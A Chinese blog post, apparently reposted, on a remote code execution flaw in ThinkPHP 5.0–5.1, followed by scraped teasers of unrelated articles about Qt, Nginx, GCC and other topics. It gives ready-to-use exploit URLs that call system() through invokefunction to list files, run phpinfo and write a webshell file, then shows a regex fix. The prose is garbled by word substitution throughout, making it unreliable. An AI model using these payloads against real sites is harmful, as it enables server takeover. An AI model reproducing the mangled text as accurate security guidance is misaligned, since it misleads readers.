thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

THINKPHP毛病修复,官方于克日,对现有的thinkphp5.0到5.1全部版本举行了升级,以及补丁更新,这次更新重要是举行了一些毛病修复,最严峻的就是之前存在的SQL注入毛病,以及长途代码实行查询体系的毛病都举行了修复,官方本以为没有题目了,但是在现实的宁静检测当中发明,照旧存在题目,照旧可以长途代码举行注入,插入非法字符,提交到办事器后端中去。

关于这次发明的oday毛病,我们来看下官方之前更新的代码文件是怎么样的,更新的步伐文件路径是library文件夹下的think目次里的app.php,如下图:

毛病产生的缘故原由就在于这个控制器这里,整个thinkphp框架里的功效对控制器没有举行严酷的宁静过滤于查抄,使打击者可以伪造恶意参数举行逼迫插入,最基础的缘故原由就是正则的表达式写的欠好,导致可以绕过。

在controller获取控制器后,直接举行赋值,但是并没有对控制器的名举行严酷的检测,导致可以利用斜杠等特别标记来长途代码注入。

我们来搭建一下网站的情况,apache+mysql+Linux centos体系,搭建好的测试情况地点是http://127.0.01/anquan ,我们可以直接在index.php背面伪造打击参数,示比方下:

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

直接get方法提交到网站中去,可以直接查询到网站当前根目次的全部文件,截图如下:

通过该毛病也可以直接长途代码注入实行phpinfo语句,查询当前的php版本,路径,扩展,以及php.ini存放的地点,都可以看得到,结构如下代码即可。

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20‘phpinfo();‘

有些人大概会问了,既然都可以phpinfo,查询目次文件,可不可以getshell写网站木马文件到网站里呢? 答案是可以的,我们测试的时间是以一句话木马代码的写入到safe.php文件里。

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%27%20>%20safe.php

关于这次thinkphp的毛病使用以及阐发到此就竣事了,该毛病属于高危毛病,危害严峻性较大,许多升级更新补丁的网站都市受到打击,乃至有些网站会被挂马,那么该怎样修复thinkphp的毛病呢?更换之前的正规矩表达式即可,还必要对网站的目次举行权限摆设,防备天生php文件,对网站上的毛病举行修复,大概是对网站宁静防护参数举行重新设置,使他切合其时的网站情况。假如不懂怎样修复网站毛病,也可以找专业的网站宁静公司来处置惩罚,海内如Sinesafe和绿盟、启明星辰等宁静公司比力专业.

针对付这个环境,我们要对其library/think/App.php代码里的正规矩表达式举行变动,if (!preg_match(‘/^[A-Za-z][\w\.]*$/‘, $controller)) { throw new HttpException(404, ‘controller not exists:‘ . $controller); }

解决方法:

‘url_route_on‘           => true,

原文地址:https://www.cnblogs.com/Essaycode/p/10117154.html

时间: 2024-11-08 22:41:38

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell的相关文章

使用QT 4.8.6 + Cmake 3.0.0 编译 最新版本OpenCv3.0.0

mingw32 (x32) gcc 4.8.1 g++ 4.8.1 qt 4.8.6 opencv-3.0.0 2015-06-04 cmake 3.3.0-rc1 windows 7 x64 参考文章: http://blog.csdn.net/qiurisuixiang/article/details/8665278 -------------- -------------------------------- 修改 opencv/sources/CMakeLists.txt 行数: 174

Nginx平滑升级到最新版本

(一)简述: 早上收到nginx最新漏洞的通知,Nginx官方发布最新的安全公告,在Nginx范围过滤器中发现了一个安全问题(CVE-2017-7529),通过精心构造的恶意请求可能会导致整数溢出并且不正确处理范围,从而导致敏感信息泄漏. 当使用Nginx标准模块时,如果文件头从缓存返回响应,允许攻击者获取缓存文件头.在某些配置中,缓存文件头可能包含后端服务器IP地址或其他敏感信息.此外,如果使用第三方模块有潜在的可能导致拒绝服务. 影响版本 Nginx 0.5.6-1.13.2 漏洞等级 中危

寻找最好用企业项目设计工具?不如试试最新版本的Visual Paradigm!

Visual Paradigm是包含设计共享.线框图和数据库设计新特性的企业项目设计工具.现最新版本16.0已发布,引入了许多新功能以及几十种的新的图表,同时还增强了在线图表功能和支持从Customer Journey Map打开完整图表编辑器的功能.新版本,新功能,赶快一起来了解吧!以下文章我们陈述了Visual Paradigm新版更新的亮点!大型Scrum画布大规模Scrum Canvas是一个scrum工具,为每个Scrum团队构建,通过直观的可视化画布来规划,跟踪和管理scrum项目.

mydumper 最新版本0.9.1 ,备份必备工具。

1.下载地址 https://launchpad.net/mydumper/+download 2.安装 新版本支持GTID 0.9.1 ,因为我维护的数据库都启用了GTID. yum install gcc-c++ cmake glib2-devel pcre-devel.x86_64  -y tar -zxvf mydumper-0.9.1.tar.gz -C /usr/local/ cd /usr/local/mydumper* cmake . echo $? make make inst

WebMisSharp升级说明,最新版本1.6.0

尊敬的C3 AM.C3 FX.WebMisSharp用户您好: 非常感谢长期来您对WebMisSharp系列产品的支持,您的使用和反馈是我们进步的最大动力.在你们的帮助下我们又向前迈进了一步,我们功能升级啦!!! 本邮件为作者JackChain群发,您可能仅是某一个产品的使用者,或许您已经忘记这些产品.没关系,我简单提醒下: C3 AM:企业级通用权限管理系统,SAAS平台,体验地址http://saas.chinacloudtech.com C3 FX:企业级快速开发框架,是配合WebMisS

升级cocoapods 0.36.0之后,解决更新的部分依赖库,不是最新版本的问题

在升级到cocoapods 0.36.0之后,使用原本podfile配置,在重新执行pod install之后,一些依赖库的版本,低于github上的最新版本.可按照下列配置.指定git,强制使用最新版本 source 'https://github.com/CocoaPods/Specs.git' platform :ios, '6.1' pod 'IQKeyboardManager', :git => "https://github.com/hackiftekhar/IQKeyboar

STL源码剖析---根据最新版本的g++4.9.0(支持C++11)的修订(1)空间配置器

源码剖析采用的G++版本为2.91.57版本,是比较老的版本与最新版本4.9.0有某些方面的差别.现在我针对最新版本做一个分析.我下载了最新的gcc-4.9.0的包作为观察对象: 我们#include <>时的头文件放在:gcc-4.9.0/libstdc++-v3/include/std:例如vector. 真正的实现文件放在:gcc-4.9.0/libstdc++-v3/include/bits:例如:stl_vector,注意前面的stl_. 最后要说的是:技术是不断进步,不断发展变化的

最新版本cocos2d&#173;2.0&#173;x&#173;2.0.2使用新资源加载策略!不再沿用-hd、-

 前段时间cocos2dx更新了最新版本cocos2d-2.0-x-2.0.2,也从这个版本开始对于资源加载与管理都改变了策略. 在之前的加载方式都是通过沿用与cocos2d-iphone一样的加载资源方式,对于图片名后添加-hd,-ipad,-ipadhd方式,当用户开启项目的高清视网膜后就可以默认寻找对应的资源.但是从cocos2d-2.0-x-2.0.2版本开始,资源加载策略不在如此了.对跨平台整合不清楚的请看cocos2dx最新2.x版本跨平台整合NDK+Xcode 最新资源加载策略

【转】CentOS 6.6 升级GCC G++ (当前最新版本为v6.1.0) (完整)

原文地址:https://www.cnblogs.com/lzpong/p/5755678.html 我这里是centos7 升级到gcc8.1,过程差不多,参考这篇文章,记录一下. ---原文--- CentOS 6.6 升级GCC G++ (当前最新GCC/G++版本为v6.1.0) 没有便捷方式, yum update....   yum install 或者 添加yum 的 repo 文件 也不行, 只能更新到 4.4.7! then,  只能手动编译安装了,那么开始第一步下载源代码吧,